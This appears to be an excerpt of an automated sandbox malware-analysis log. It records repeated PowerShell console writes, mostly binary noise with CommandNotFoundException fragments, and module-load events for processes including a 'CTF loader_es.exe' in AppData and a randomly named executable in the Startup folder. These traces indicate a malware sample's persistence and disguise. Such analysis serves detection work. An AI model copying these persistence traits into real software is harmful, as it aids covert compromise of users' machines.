Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................:.......................0...............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................W.......................0...............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................$...............................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................$...............................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................$.......<.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................$...............................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................$...............................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................$.......C.......................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................$...............................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............................'.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................y.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................*.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................U.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................p.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............@.......$.......B.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............@.......$.......w.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............@.......P...............................0......./.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............@.......P...............................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............@.......................................0.......;...............|.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............@...............!.......................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......K.......................0.......G...............".......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............@...............g.......................0.......G.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............@.......................................0.......S.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............@.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............@.......................................0......._...............~.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............@.......P...............................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............@.......P...............................0.......k.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............@.......P...............................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............@.......P...............................0.......w.......................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@.......P...............................0.......................l.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@.......P...............................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............@...............>.......................0...............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............@...............Y.......................0...............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....T.......x.......P.......7.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....T.......x...............u.......................0.......#.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....T.......x.......L...............................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....T.......x.......................................0......./.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....T.......x.......L...............................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....T.......x.......p.......,.......................0.......;.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......Z.......................0.......G.......x.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....T.......x.......p.......z.......................0.......G.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....T.......x.......L...............................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....T.......x.......p...............................0.......S.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....T.......x.......p...............................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....T.......x.......@.......'.......................0......._.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....T.......x.......p.......\.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....T.......x.......L...............................0.......k.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......x.......2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....T.......x.......L...............................0.......w.......x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......x.......L.......+.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......x.......p.......f.......................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......x.......p...............................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......x.......p...............................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....d.......................S.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....d.......................q.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....d...............................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....d...............................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....d...............................................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....d...............P...............................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......D.......................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....d.......................m.......................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....d...............................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....d...............P...............................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....d...............................................0......._...............~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....d...............................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....d.......................g.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....d...............................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....d...............................................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......................1.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......................d.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....d...............................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d...............P...............................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............t...............H.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............t...............}.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............t.......................................0......./.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............t.......................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............t...............'.......................0.......;...............|.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............t...............W.......................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............t.......................................0.......G.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............t.......................................0.......S.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............t.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............t...............:.......................0......._.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............t...............X.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............t.......................................0.......k.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............t.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............t.......................................0.......w.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............t...............U.......................0.......................l.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............t...............~.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............t.......................................0...............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............t.......................................0...............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............8.......................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............8.......................................0.......#.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............8.......................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............8.......................................0......./.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............8...............2.......................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............8...............Y.......................0.......;.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.........{.....".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............8.......................................0.......G.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............8.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............8.......................................0.......S.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............8...............E.......................0......._...............~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............8...............`.......................0......._.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............8.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............8.......................................0.......k.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.........{.....2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............8.......................................0.......w.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......................................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8...............?.......................0.................{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............8...............g.......................0.................{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......................................0.................{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....$...............................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....$.......................+.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....$.......................W.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....$.......................}.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....$...............................................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....$...............................................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......?.......................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....$.......................a.......................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....$...............................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....$...............................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....$...............................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....$...............................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....$.......................V.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....$...............................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....$...............................................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......................}.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$...............................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....$.......................*.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....$.......................K.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............D.......................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............D.......................................0.......#.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............D...............J.......................0......./.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............D...............o.......................0......./.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............D.......................................0.......;...............|.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............D.......................................0.......;.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......h.......".......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............D...............-.......................0.......G.......h...............x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............D...............W.......................0.......S.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............D.......................................0.......S.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............D.......................................0......._...............~.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............D.......................................0......._.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............D.......................................0.......k.......................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............D...............G.......................0.......k.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......h.......2.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............D.......................................0.......w.......h...............x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............D.......................................0.......................l.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............D.......................................0...............h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............D...............$.......................0...............h...............x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............D...............?.......................0...............h...............x...............
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
